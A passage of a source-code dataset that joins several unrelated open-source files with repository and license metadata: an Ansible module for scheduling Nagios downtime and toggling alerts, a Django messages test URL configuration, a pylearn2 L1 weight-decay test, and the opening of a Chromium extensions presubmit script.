return
|
mpl-2.0
|
mcltn/ansible-modules-extras
|
monitoring/nagios.py
|
39
|
36108
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This file is largely copied from the Nagios module included in the
# Func project. Original copyright follows:
#
# func-nagios - Schedule downtime and enables/disable notifications
# Copyright 2011, Red Hat, Inc.
# Tim Bielawa <[email protected]>
#
# This software may be freely redistributed under the terms of the GNU
# general public license version 2 or any later version.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: nagios
short_description: Perform common tasks in Nagios related to downtime and notifications.
description:
- "The M(nagios) module has two basic functions: scheduling downtime and toggling alerts for services or hosts."
- All actions require the I(host) parameter to be given explicitly. In playbooks you can use the C({{inventory_hostname}}) variable to refer to the host the playbook is currently running on.
- You can specify multiple services at once by separating them with commas, .e.g., C(services=httpd,nfs,puppet).
- When specifying what service to handle there is a special service value, I(host), which will handle alerts/downtime for the I(host itself), e.g., C(service=host). This keyword may not be given with other services at the same time. I(Setting alerts/downtime for a host does not affect alerts/downtime for any of the services running on it.) To schedule downtime for all services on particular host use keyword "all", e.g., C(service=all).
- When using the M(nagios) module you will need to specify your Nagios server using the C(delegate_to) parameter.
version_added: "0.7"
options:
action:
description:
- Action to take.
- servicegroup options were added in 2.0.
- delete_downtime options were added in 2.2.
required: true
choices: [ "downtime", "delete_downtime", "enable_alerts", "disable_alerts", "silence", "unsilence",
"silence_nagios", "unsilence_nagios", "command", "servicegroup_service_downtime",
"servicegroup_host_downtime" ]
host:
description:
- Host to operate on in Nagios.
required: false
default: null
cmdfile:
description:
- Path to the nagios I(command file) (FIFO pipe).
Only required if auto-detection fails.
required: false
default: auto-detected
author:
description:
- Author to leave downtime comments as.
Only usable with the C(downtime) action.
required: false
default: Ansible
comment:
version_added: "2.0"
description:
- Comment for C(downtime) action.
required: false
default: Scheduling downtime
minutes:
description:
- Minutes to schedule downtime for.
- Only usable with the C(downtime) action.
required: false
default: 30
services:
description:
- What to manage downtime/alerts for. Separate multiple services with commas.
C(service) is an alias for C(services).
B(Required) option when using the C(downtime), C(enable_alerts), and C(disable_alerts) actions.
aliases: [ "service" ]
required: true
servicegroup:
version_added: "2.0"
description:
- The Servicegroup we want to set downtimes/alerts for.
B(Required) option when using the C(servicegroup_service_downtime) amd C(servicegroup_host_downtime).
command:
description:
- The raw command to send to nagios, which
should not include the submitted time header or the line-feed
B(Required) option when using the C(command) action.
required: true
author: "Tim Bielawa (@tbielawa)"
'''
EXAMPLES = '''
# set 30 minutes of apache downtime
- nagios: action=downtime minutes=30 service=httpd host={{ inventory_hostname }}
# schedule an hour of HOST downtime
- nagios: action=downtime minutes=60 service=host host={{ inventory_hostname }}
# schedule an hour of HOST downtime, with a comment describing the reason
- nagios: action=downtime minutes=60 service=host host={{ inventory_hostname }}
comment='This host needs disciplined'
# schedule downtime for ALL services on HOST
- nagios: action=downtime minutes=45 service=all host={{ inventory_hostname }}
# schedule downtime for a few services
- nagios: action=downtime services=frob,foobar,qeuz host={{ inventory_hostname }}
# set 30 minutes downtime for all services in servicegroup foo
- nagios: action=servicegroup_service_downtime minutes=30 servicegroup=foo host={{ inventory_hostname }}
# set 30 minutes downtime for all host in servicegroup foo
- nagios: action=servicegroup_host_downtime minutes=30 servicegroup=foo host={{ inventory_hostname }}
# delete all downtime for a given host
- nagios: action=delete_downtime host={{ inventory_hostname }} service=all
# delete all downtime for HOST with a particular comment
- nagios: action=delete_downtime host={{ inventory_hostname }} service=host comment="Planned maintenance"
# enable SMART disk alerts
- nagios: action=enable_alerts service=smart host={{ inventory_hostname }}
# "two services at once: disable httpd and nfs alerts"
- nagios: action=disable_alerts service=httpd,nfs host={{ inventory_hostname }}
# disable HOST alerts
- nagios: action=disable_alerts service=host host={{ inventory_hostname }}
# silence ALL alerts
- nagios: action=silence host={{ inventory_hostname }}
# unsilence all alerts
- nagios: action=unsilence host={{ inventory_hostname }}
# SHUT UP NAGIOS
- nagios: action=silence_nagios
# ANNOY ME NAGIOS
- nagios: action=unsilence_nagios
# command something
- nagios: action=command command='DISABLE_FAILURE_PREDICTION'
'''
import ConfigParser
import types
import time
import os.path
######################################################################
def which_cmdfile():
locations = [
# rhel
'/etc/nagios/nagios.cfg',
# debian
'/etc/nagios3/nagios.cfg',
# older debian
'/etc/nagios2/nagios.cfg',
# bsd, solaris
'/usr/local/etc/nagios/nagios.cfg',
# groundwork it monitoring
'/usr/local/groundwork/nagios/etc/nagios.cfg',
# open monitoring distribution
'/omd/sites/oppy/tmp/nagios/nagios.cfg',
# ???
'/usr/local/nagios/etc/nagios.cfg',
'/usr/local/nagios/nagios.cfg',
'/opt/nagios/etc/nagios.cfg',
'/opt/nagios/nagios.cfg',
# icinga on debian/ubuntu
'/etc/icinga/icinga.cfg',
# icinga installed from source (default location)
'/usr/local/icinga/etc/icinga.cfg',
]
for path in locations:
if os.path.exists(path):
for line in open(path):
if line.startswith('command_file'):
return line.split('=')[1].strip()
return None
######################################################################
def main():
ACTION_CHOICES = [
'downtime',
'delete_downtime',
'silence',
'unsilence',
'enable_alerts',
'disable_alerts',
'silence_nagios',
'unsilence_nagios',
'command',
'servicegroup_host_downtime',
'servicegroup_service_downtime',
]
module = AnsibleModule(
argument_spec=dict(
action=dict(required=True, default=None, choices=ACTION_CHOICES),
author=dict(default='Ansible'),
comment=dict(default='Scheduling downtime'),
host=dict(required=False, default=None),
servicegroup=dict(required=False, default=None),
minutes=dict(default=30),
cmdfile=dict(default=which_cmdfile()),
services=dict(default=None, aliases=['service']),
command=dict(required=False, default=None),
)
)
action = module.params['action']
host = module.params['host']
servicegroup = module.params['servicegroup']
minutes = module.params['minutes']
services = module.params['services']
cmdfile = module.params['cmdfile']
command = module.params['command']
##################################################################
# Required args per action:
# downtime = (minutes, service, host)
# (un)silence = (host)
# (enable/disable)_alerts = (service, host)
# command = command
#
# AnsibleModule will verify most stuff, we need to verify
# 'minutes' and 'service' manually.
##################################################################
if action not in ['command', 'silence_nagios', 'unsilence_nagios']:
if not host:
module.fail_json(msg='no host specified for action requiring one')
######################################################################
if action == 'downtime':
# Make sure there's an actual service selected
if not services:
module.fail_json(msg='no service selected to set downtime for')
# Make sure minutes is a number
try:
m = int(minutes)
if not isinstance(m, types.IntType):
module.fail_json(msg='minutes must be a number')
except Exception:
module.fail_json(msg='invalid entry for minutes')
######################################################################
if action == 'delete_downtime':
# Make sure there's an actual service selected
if not services:
module.fail_json(msg='no service selected to set downtime for')
######################################################################
if action in ['servicegroup_service_downtime', 'servicegroup_host_downtime']:
# Make sure there's an actual servicegroup selected
if not servicegroup:
module.fail_json(msg='no servicegroup selected to set downtime for')
# Make sure minutes is a number
try:
m = int(minutes)
if not isinstance(m, types.IntType):
module.fail_json(msg='minutes must be a number')
except Exception:
module.fail_json(msg='invalid entry for minutes')
##################################################################
if action in ['enable_alerts', 'disable_alerts']:
if not services:
module.fail_json(msg='a service is required when setting alerts')
if action in ['command']:
if not command:
module.fail_json(msg='no command passed for command action')
##################################################################
if not cmdfile:
module.fail_json(msg='unable to locate nagios.cfg')
##################################################################
ansible_nagios = Nagios(module, **module.params)
if module.check_mode:
module.exit_json(changed=True)
else:
ansible_nagios.act()
##################################################################
######################################################################
class Nagios(object):
"""
Perform common tasks in Nagios related to downtime and
notifications.
The complete set of external commands Nagios handles is documented
on their website:
http://old.nagios.org/developerinfo/externalcommands/commandlist.php
Note that in the case of `schedule_svc_downtime`,
`enable_svc_notifications`, and `disable_svc_notifications`, the
service argument should be passed as a list.
"""
def __init__(self, module, **kwargs):
self.module = module
self.action = kwargs['action']
self.author = kwargs['author']
self.comment = kwargs['comment']
self.host = kwargs['host']
self.servicegroup = kwargs['servicegroup']
self.minutes = int(kwargs['minutes'])
self.cmdfile = kwargs['cmdfile']
self.command = kwargs['command']
if (kwargs['services'] is None) or (kwargs['services'] == 'host') or (kwargs['services'] == 'all'):
self.services = kwargs['services']
else:
self.services = kwargs['services'].split(',')
self.command_results = []
def _now(self):
"""
The time in seconds since 12:00:00AM Jan 1, 1970
"""
return int(time.time())
def _write_command(self, cmd):
"""
Write the given command to the Nagios command file
"""
try:
fp = open(self.cmdfile, 'w')
fp.write(cmd)
fp.flush()
fp.close()
self.command_results.append(cmd.strip())
except IOError:
self.module.fail_json(msg='unable to write to nagios command file',
cmdfile=self.cmdfile)
def _fmt_dt_str(self, cmd, host, duration, author=None,
comment=None, start=None,
svc=None, fixed=1, trigger=0):
"""
Format an external-command downtime string.
cmd - Nagios command ID
host - Host schedule downtime on
duration - Minutes to schedule downtime for
author - Name to file the downtime as
comment - Reason for running this command (upgrade, reboot, etc)
start - Start of downtime in seconds since 12:00AM Jan 1 1970
Default is to use the entry time (now)
svc - Service to schedule downtime for, omit when for host downtime
fixed - Start now if 1, start when a problem is detected if 0
trigger - Optional ID of event to start downtime from. Leave as 0 for
fixed downtime.
Syntax: [submitted] COMMAND;<host_name>;[<service_description>]
<start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
<comment>
"""
entry_time = self._now()
if start is None:
start = entry_time
hdr = "[%s] %s;%s;" % (entry_time, cmd, host)
duration_s = (duration * 60)
end = start + duration_s
if not author:
author = self.author
if not comment:
comment = self.comment
if svc is not None:
dt_args = [svc, str(start), str(end), str(fixed), str(trigger),
str(duration_s), author, comment]
else:
# Downtime for a host if no svc specified
dt_args = [str(start), str(end), str(fixed), str(trigger),
str(duration_s), author, comment]
dt_arg_str = ";".join(dt_args)
dt_str = hdr + dt_arg_str + "\n"
return dt_str
def _fmt_dt_del_str(self, cmd, host, svc=None, start=None, comment=None):
"""
Format an external-command downtime deletion string.
cmd - Nagios command ID
host - Host to remove scheduled downtime from
comment - Reason downtime was added (upgrade, reboot, etc)
start - Start of downtime in seconds since 12:00AM Jan 1 1970
svc - Service to remove downtime for, omit to remove all downtime for the host
Syntax: [submitted] COMMAND;<host_name>;
[<service_desription>];[<start_time>];[<comment>]
"""
entry_time = self._now()
hdr = "[%s] %s;%s;" % (entry_time, cmd, host)
if comment is None:
comment = self.comment
dt_del_args = []
if svc is not None:
dt_del_args.append(svc)
else:
dt_del_args.append('')
if start is not None:
dt_del_args.append(str(start))
else:
dt_del_args.append('')
if comment is not None:
dt_del_args.append(comment)
else:
dt_del_args.append('')
dt_del_arg_str = ";".join(dt_del_args)
dt_del_str = hdr + dt_del_arg_str + "\n"
return dt_del_str
def _fmt_notif_str(self, cmd, host=None, svc=None):
"""
Format an external-command notification string.
cmd - Nagios command ID.
host - Host to en/disable notifications on.. A value is not required
for global downtime
svc - Service to schedule downtime for. A value is not required
for host downtime.
Syntax: [submitted] COMMAND;<host_name>[;<service_description>]
"""
entry_time = self._now()
notif_str = "[%s] %s" % (entry_time, cmd)
if host is not None:
notif_str += ";%s" % host
if svc is not None:
notif_str += ";%s" % svc
notif_str += "\n"
return notif_str
def schedule_svc_downtime(self, host, services=None, minutes=30):
"""
This command is used to schedule downtime for a particular
service.
During the specified downtime, Nagios will not send
notifications out about the service.
Syntax: SCHEDULE_SVC_DOWNTIME;<host_name>;<service_description>
<start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
<comment>
"""
cmd = "SCHEDULE_SVC_DOWNTIME"
if services is None:
services = []
for service in services:
dt_cmd_str = self._fmt_dt_str(cmd, host, minutes, svc=service)
self._write_command(dt_cmd_str)
def schedule_host_downtime(self, host, minutes=30):
"""
This command is used to schedule downtime for a particular
host.
During the specified downtime, Nagios will not send
notifications out about the host.
Syntax: SCHEDULE_HOST_DOWNTIME;<host_name>;<start_time>;<end_time>;
<fixed>;<trigger_id>;<duration>;<author>;<comment>
"""
cmd = "SCHEDULE_HOST_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, host, minutes)
self._write_command(dt_cmd_str)
def schedule_host_svc_downtime(self, host, minutes=30):
"""
This command is used to schedule downtime for
all services associated with a particular host.
During the specified downtime, Nagios will not send
notifications out about the host.
SCHEDULE_HOST_SVC_DOWNTIME;<host_name>;<start_time>;<end_time>;
<fixed>;<trigger_id>;<duration>;<author>;<comment>
"""
cmd = "SCHEDULE_HOST_SVC_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, host, minutes)
self._write_command(dt_cmd_str)
def delete_host_downtime(self, host, services=None, comment=None):
"""
This command is used to remove scheduled downtime for a particular
host.
Syntax: DEL_DOWNTIME_BY_HOST_NAME;<host_name>;
[<service_desription>];[<start_time>];[<comment>]
"""
cmd = "DEL_DOWNTIME_BY_HOST_NAME"
if services is None:
dt_del_cmd_str = self._fmt_dt_del_str(cmd, host, comment=comment)
self._write_command(dt_del_cmd_str)
else:
for service in services:
dt_del_cmd_str = self._fmt_dt_del_str(cmd, host, svc=service, comment=comment)
self._write_command(dt_del_cmd_str)
def schedule_hostgroup_host_downtime(self, hostgroup, minutes=30):
"""
This command is used to schedule downtime for all hosts in a
particular hostgroup.
During the specified downtime, Nagios will not send
notifications out about the hosts.
Syntax: SCHEDULE_HOSTGROUP_HOST_DOWNTIME;<hostgroup_name>;<start_time>;
<end_time>;<fixed>;<trigger_id>;<duration>;<author>;<comment>
"""
cmd = "SCHEDULE_HOSTGROUP_HOST_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, hostgroup, minutes)
self._write_command(dt_cmd_str)
def schedule_hostgroup_svc_downtime(self, hostgroup, minutes=30):
"""
This command is used to schedule downtime for all services in
a particular hostgroup.
During the specified downtime, Nagios will not send
notifications out about the services.
Note that scheduling downtime for services does not
automatically schedule downtime for the hosts those services
are associated with.
Syntax: SCHEDULE_HOSTGROUP_SVC_DOWNTIME;<hostgroup_name>;<start_time>;
<end_time>;<fixed>;<trigger_id>;<duration>;<author>;<comment>
"""
cmd = "SCHEDULE_HOSTGROUP_SVC_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, hostgroup, minutes)
self._write_command(dt_cmd_str)
def schedule_servicegroup_host_downtime(self, servicegroup, minutes=30):
"""
This command is used to schedule downtime for all hosts in a
particular servicegroup.
During the specified downtime, Nagios will not send
notifications out about the hosts.
Syntax: SCHEDULE_SERVICEGROUP_HOST_DOWNTIME;<servicegroup_name>;
<start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
<comment>
"""
cmd = "SCHEDULE_SERVICEGROUP_HOST_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, servicegroup, minutes)
self._write_command(dt_cmd_str)
def schedule_servicegroup_svc_downtime(self, servicegroup, minutes=30):
"""
This command is used to schedule downtime for all services in
a particular servicegroup.
During the specified downtime, Nagios will not send
notifications out about the services.
Note that scheduling downtime for services does not
automatically schedule downtime for the hosts those services
are associated with.
Syntax: SCHEDULE_SERVICEGROUP_SVC_DOWNTIME;<servicegroup_name>;
<start_time>;<end_time>;<fixed>;<trigger_id>;<duration>;<author>;
<comment>
"""
cmd = "SCHEDULE_SERVICEGROUP_SVC_DOWNTIME"
dt_cmd_str = self._fmt_dt_str(cmd, servicegroup, minutes)
self._write_command(dt_cmd_str)
def disable_host_svc_notifications(self, host):
"""
This command is used to prevent notifications from being sent
out for all services on the specified host.
Note that this command does not disable notifications from
being sent out about the host.
Syntax: DISABLE_HOST_SVC_NOTIFICATIONS;<host_name>
"""
cmd = "DISABLE_HOST_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, host)
self._write_command(notif_str)
def disable_host_notifications(self, host):
"""
This command is used to prevent notifications from being sent
out for the specified host.
Note that this command does not disable notifications for
services associated with this host.
Syntax: DISABLE_HOST_NOTIFICATIONS;<host_name>
"""
cmd = "DISABLE_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, host)
self._write_command(notif_str)
def disable_svc_notifications(self, host, services=None):
"""
This command is used to prevent notifications from being sent
out for the specified service.
Note that this command does not disable notifications from
being sent out about the host.
Syntax: DISABLE_SVC_NOTIFICATIONS;<host_name>;<service_description>
"""
cmd = "DISABLE_SVC_NOTIFICATIONS"
if services is None:
services = []
for service in services:
notif_str = self._fmt_notif_str(cmd, host, svc=service)
self._write_command(notif_str)
def disable_servicegroup_host_notifications(self, servicegroup):
"""
This command is used to prevent notifications from being sent
out for all hosts in the specified servicegroup.
Note that this command does not disable notifications for
services associated with hosts in this service group.
Syntax: DISABLE_SERVICEGROUP_HOST_NOTIFICATIONS;<servicegroup_name>
"""
cmd = "DISABLE_SERVICEGROUP_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, servicegroup)
self._write_command(notif_str)
def disable_servicegroup_svc_notifications(self, servicegroup):
"""
This command is used to prevent notifications from being sent
out for all services in the specified servicegroup.
Note that this does not prevent notifications from being sent
out about the hosts in this servicegroup.
Syntax: DISABLE_SERVICEGROUP_SVC_NOTIFICATIONS;<servicegroup_name>
"""
cmd = "DISABLE_SERVICEGROUP_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, servicegroup)
self._write_command(notif_str)
def disable_hostgroup_host_notifications(self, hostgroup):
"""
Disables notifications for all hosts in a particular
hostgroup.
Note that this does not disable notifications for the services
associated with the hosts in the hostgroup - see the
DISABLE_HOSTGROUP_SVC_NOTIFICATIONS command for that.
Syntax: DISABLE_HOSTGROUP_HOST_NOTIFICATIONS;<hostgroup_name>
"""
cmd = "DISABLE_HOSTGROUP_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, hostgroup)
self._write_command(notif_str)
def disable_hostgroup_svc_notifications(self, hostgroup):
"""
Disables notifications for all services associated with hosts
in a particular hostgroup.
Note that this does not disable notifications for the hosts in
the hostgroup - see the DISABLE_HOSTGROUP_HOST_NOTIFICATIONS
command for that.
Syntax: DISABLE_HOSTGROUP_SVC_NOTIFICATIONS;<hostgroup_name>
"""
cmd = "DISABLE_HOSTGROUP_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, hostgroup)
self._write_command(notif_str)
def enable_host_notifications(self, host):
"""
Enables notifications for a particular host.
Note that this command does not enable notifications for
services associated with this host.
Syntax: ENABLE_HOST_NOTIFICATIONS;<host_name>
"""
cmd = "ENABLE_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, host)
self._write_command(notif_str)
def enable_host_svc_notifications(self, host):
"""
Enables notifications for all services on the specified host.
Note that this does not enable notifications for the host.
Syntax: ENABLE_HOST_SVC_NOTIFICATIONS;<host_name>
"""
cmd = "ENABLE_HOST_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, host)
nagios_return = self._write_command(notif_str)
if nagios_return:
return notif_str
else:
return "Fail: could not write to the command file"
def enable_svc_notifications(self, host, services=None):
"""
Enables notifications for a particular service.
Note that this does not enable notifications for the host.
Syntax: ENABLE_SVC_NOTIFICATIONS;<host_name>;<service_description>
"""
cmd = "ENABLE_SVC_NOTIFICATIONS"
if services is None:
services = []
nagios_return = True
return_str_list = []
for service in services:
notif_str = self._fmt_notif_str(cmd, host, svc=service)
nagios_return = self._write_command(notif_str) and nagios_return
return_str_list.append(notif_str)
if nagios_return:
return return_str_list
else:
return "Fail: could not write to the command file"
def enable_hostgroup_host_notifications(self, hostgroup):
"""
Enables notifications for all hosts in a particular hostgroup.
Note that this command does not enable notifications for
services associated with the hosts in this hostgroup.
Syntax: ENABLE_HOSTGROUP_HOST_NOTIFICATIONS;<hostgroup_name>
"""
cmd = "ENABLE_HOSTGROUP_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, hostgroup)
nagios_return = self._write_command(notif_str)
if nagios_return:
return notif_str
else:
return "Fail: could not write to the command file"
def enable_hostgroup_svc_notifications(self, hostgroup):
"""
Enables notifications for all services that are associated
with hosts in a particular hostgroup.
Note that this does not enable notifications for the hosts in
this hostgroup.
Syntax: ENABLE_HOSTGROUP_SVC_NOTIFICATIONS;<hostgroup_name>
"""
cmd = "ENABLE_HOSTGROUP_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, hostgroup)
nagios_return = self._write_command(notif_str)
if nagios_return:
return notif_str
else:
return "Fail: could not write to the command file"
def enable_servicegroup_host_notifications(self, servicegroup):
"""
Enables notifications for all hosts that have services that
are members of a particular servicegroup.
Note that this command does not enable notifications for
services associated with the hosts in this servicegroup.
Syntax: ENABLE_SERVICEGROUP_HOST_NOTIFICATIONS;<servicegroup_name>
"""
cmd = "ENABLE_SERVICEGROUP_HOST_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, servicegroup)
nagios_return = self._write_command(notif_str)
if nagios_return:
return notif_str
else:
return "Fail: could not write to the command file"
def enable_servicegroup_svc_notifications(self, servicegroup):
"""
Enables notifications for all services that are members of a
particular servicegroup.
Note that this does not enable notifications for the hosts in
this servicegroup.
Syntax: ENABLE_SERVICEGROUP_SVC_NOTIFICATIONS;<servicegroup_name>
"""
cmd = "ENABLE_SERVICEGROUP_SVC_NOTIFICATIONS"
notif_str = self._fmt_notif_str(cmd, servicegroup)
nagios_return = self._write_command(notif_str)
if nagios_return:
return notif_str
else:
return "Fail: could not write to the command file"
def silence_host(self, host):
"""
This command is used to prevent notifications from being sent
out for the host and all services on the specified host.
This is equivalent to calling disable_host_svc_notifications
and disable_host_notifications.
Syntax: DISABLE_HOST_SVC_NOTIFICATIONS;<host_name>
Syntax: DISABLE_HOST_NOTIFICATIONS;<host_name>
"""
cmd = [
"DISABLE_HOST_SVC_NOTIFICATIONS",
"DISABLE_HOST_NOTIFICATIONS"
]
nagios_return = True
return_str_list = []
for c in cmd:
notif_str = self._fmt_notif_str(c, host)
nagios_return = self._write_command(notif_str) and nagios_return
return_str_list.append(notif_str)
if nagios_return:
return return_str_list
else:
return "Fail: could not write to the command file"
def unsilence_host(self, host):
"""
This command is used to enable notifications for the host and
all services on the specified host.
This is equivalent to calling enable_host_svc_notifications
and enable_host_notifications.
Syntax: ENABLE_HOST_SVC_NOTIFICATIONS;<host_name>
Syntax: ENABLE_HOST_NOTIFICATIONS;<host_name>
"""
cmd = [
"ENABLE_HOST_SVC_NOTIFICATIONS",
"ENABLE_HOST_NOTIFICATIONS"
]
nagios_return = True
return_str_list = []
for c in cmd:
notif_str = self._fmt_notif_str(c, host)
nagios_return = self._write_command(notif_str) and nagios_return
return_str_list.append(notif_str)
if nagios_return:
return return_str_list
else:
return "Fail: could not write to the command file"
def silence_nagios(self):
"""
This command is used to disable notifications for all hosts and services
in nagios.
This is a 'SHUT UP, NAGIOS' command
"""
cmd = 'DISABLE_NOTIFICATIONS'
self._write_command(self._fmt_notif_str(cmd))
def unsilence_nagios(self):
"""
This command is used to enable notifications for all hosts and services
in nagios.
This is a 'OK, NAGIOS, GO'' command
"""
cmd = 'ENABLE_NOTIFICATIONS'
self._write_command(self._fmt_notif_str(cmd))
def nagios_cmd(self, cmd):
"""
This sends an arbitrary command to nagios
It prepends the submitted time and appends a \n
You just have to provide the properly formatted command
"""
pre = '[%s]' % int(time.time())
post = '\n'
cmdstr = '%s %s%s' % (pre, cmd, post)
self._write_command(cmdstr)
def act(self):
"""
Figure out what you want to do from ansible, and then do the
needful (at the earliest).
"""
# host or service downtime?
if self.action == 'downtime':
if self.services == 'host':
self.schedule_host_downtime(self.host, self.minutes)
elif self.services == 'all':
self.schedule_host_svc_downtime(self.host, self.minutes)
else:
self.schedule_svc_downtime(self.host,
services=self.services,
minutes=self.minutes)
elif self.action == 'delete_downtime':
if self.services=='host':
self.delete_host_downtime(self.host)
elif self.services=='all':
self.delete_host_downtime(self.host, comment='')
else:
self.delete_host_downtime(self.host, services=self.services)
elif self.action == "servicegroup_host_downtime":
if self.servicegroup:
self.schedule_servicegroup_host_downtime(servicegroup = self.servicegroup, minutes = self.minutes)
elif self.action == "servicegroup_service_downtime":
if self.servicegroup:
self.schedule_servicegroup_svc_downtime(servicegroup = self.servicegroup, minutes = self.minutes)
# toggle the host AND service alerts
elif self.action == 'silence':
self.silence_host(self.host)
elif self.action == 'unsilence':
self.unsilence_host(self.host)
# toggle host/svc alerts
elif self.action == 'enable_alerts':
if self.services == 'host':
self.enable_host_notifications(self.host)
elif self.services == 'all':
self.enable_host_svc_notifications(self.host)
else:
self.enable_svc_notifications(self.host,
services=self.services)
elif self.action == 'disable_alerts':
if self.services == 'host':
self.disable_host_notifications(self.host)
elif self.services == 'all':
self.disable_host_svc_notifications(self.host)
else:
self.disable_svc_notifications(self.host,
services=self.services)
elif self.action == 'silence_nagios':
self.silence_nagios()
elif self.action == 'unsilence_nagios':
self.unsilence_nagios()
elif self.action == 'command':
self.nagios_cmd(self.command)
# wtf?
else:
self.module.fail_json(msg="unknown action specified: '%s'" % \
self.action)
self.module.exit_json(nagios_commands=self.command_results,
changed=True)
######################################################################
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
xq262144/hue
|
desktop/core/ext-py/Django-1.6.10/django/contrib/messages/tests/urls.py
|
119
|
2470
|
from django.conf.urls import patterns, url
from django.contrib import messages
from django.core.urlresolvers import reverse
from django import forms
from django.http import HttpResponseRedirect, HttpResponse
from django.template import RequestContext, Template
from django.template.response import TemplateResponse
from django.views.decorators.cache import never_cache
from django.contrib.messages.views import SuccessMessageMixin
from django.views.generic.edit import FormView
TEMPLATE = """{% if messages %}
<ul class="messages">
{% for message in messages %}
<li{% if message.tags %} class="{{ message.tags }}"{% endif %}>
{{ message }}
</li>
{% endfor %}
</ul>
{% endif %}
"""
@never_cache
def add(request, message_type):
# don't default to False here, because we want to test that it defaults
# to False if unspecified
fail_silently = request.POST.get('fail_silently', None)
for msg in request.POST.getlist('messages'):
if fail_silently is not None:
getattr(messages, message_type)(request, msg,
fail_silently=fail_silently)
else:
getattr(messages, message_type)(request, msg)
show_url = reverse('django.contrib.messages.tests.urls.show')
return HttpResponseRedirect(show_url)
@never_cache
def add_template_response(request, message_type):
for msg in request.POST.getlist('messages'):
getattr(messages, message_type)(request, msg)
show_url = reverse('django.contrib.messages.tests.urls.show_template_response')
return HttpResponseRedirect(show_url)
@never_cache
def show(request):
t = Template(TEMPLATE)
return HttpResponse(t.render(RequestContext(request)))
@never_cache
def show_template_response(request):
return TemplateResponse(request, Template(TEMPLATE))
class ContactForm(forms.Form):
name = forms.CharField(required=True)
slug = forms.SlugField(required=True)
class ContactFormViewWithMsg(SuccessMessageMixin, FormView):
form_class = ContactForm
success_url = show
success_message = "%(name)s was created successfully"
urlpatterns = patterns('',
('^add/(debug|info|success|warning|error)/$', add),
url('^add/msg/$', ContactFormViewWithMsg.as_view(), name='add_success_msg'),
('^show/$', show),
('^template_response/add/(debug|info|success|warning|error)/$', add_template_response),
('^template_response/show/$', show_template_response),
)
|
apache-2.0
|
ddboline/pylearn2
|
pylearn2/costs/tests/test_term_1_0_l1_penalty.py
|
33
|
2673
|
"""
Test term_1_0_l1_penalty
"""
import numpy as np
from pylearn2.datasets.dense_design_matrix import DenseDesignMatrix
from pylearn2.models.mlp import MLP, Sigmoid
from pylearn2.train import Train
from pylearn2.training_algorithms.sgd import SGD, ExponentialDecay
from pylearn2.termination_criteria import And, EpochCounter, MonitorBased
from pylearn2.costs.cost import SumOfCosts
from pylearn2.costs.mlp import Default, L1WeightDecay
def create_dataset():
"""
Create a fake dataset to initiate the training
"""
x = np.array([[0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0],
[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 11, 12, 13, 14, 15,
16, 17, 18, 19, 20],
[0.3, 0.1, 0.8, 0.1, 0.2, 0.6, 0.83, 0.45, 0.0, 0.67, 0.3,
0.74, 0.8, 0.1, 0.2, 0.46, 0.83, 0.45, 0.0, 0.67]])
y = np.array([0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0,
1, 0, 1, 0, 0, 0, 0, 0]).reshape(20, 1)
x_train = x[:7, :]
x_valid = x[7:, :]
y_train = y[:7]
y_valid = y[7:]
return x_train, y_train, x_valid, y_valid
def test_correctness():
"""
Test that the cost function works with float64
"""
x_train, y_train, x_valid, y_valid = create_dataset()
trainset = DenseDesignMatrix(X=np.array(x_train), y=y_train)
validset = DenseDesignMatrix(X=np.array(x_valid), y=y_valid)
n_inputs = trainset.X.shape[1]
n_outputs = 1
n_hidden = 10
hidden_istdev = 4 * (6 / float(n_inputs + n_hidden)) ** 0.5
output_istdev = 4 * (6 / float(n_hidden + n_outputs)) ** 0.5
model = MLP(layers=[Sigmoid(dim=n_hidden, layer_name='hidden',
istdev=hidden_istdev),
Sigmoid(dim=n_outputs, layer_name='output',
istdev=output_istdev)],
nvis=n_inputs, seed=[2013, 9, 16])
termination_criterion = And([EpochCounter(max_epochs=1),
MonitorBased(prop_decrease=1e-7,
N=2)])
cost = SumOfCosts([(0.99, Default()),
(0.01, L1WeightDecay({}))])
algo = SGD(1e-1,
update_callbacks=[ExponentialDecay(decay_factor=1.00001,
min_lr=1e-10)],
cost=cost,
monitoring_dataset=validset,
termination_criterion=termination_criterion,
monitor_iteration_mode='even_shuffled_sequential',
batch_size=2)
train = Train(model=model, dataset=trainset, algorithm=algo)
train.main_loop()
if __name__ == '__main__':
test_correctness()
|
bsd-3-clause
|
TEAM-Gummy/platform_external_chromium_org
|
chrome/browser/extensions/PRESUBMIT.py
|
57
|
12404
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Chromium presubmit script for src/chrome/browser/extensions.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details on the presubmit API built into gcl.
"""
def GetPreferredTrySlaves():
return ['linux_chromeos']
class HistogramValueChecker(object):
"""Verify that changes to "extension_function_histogram_value.h" are valid.
See comments at the top of the "extension_function_histogram_value.h" file
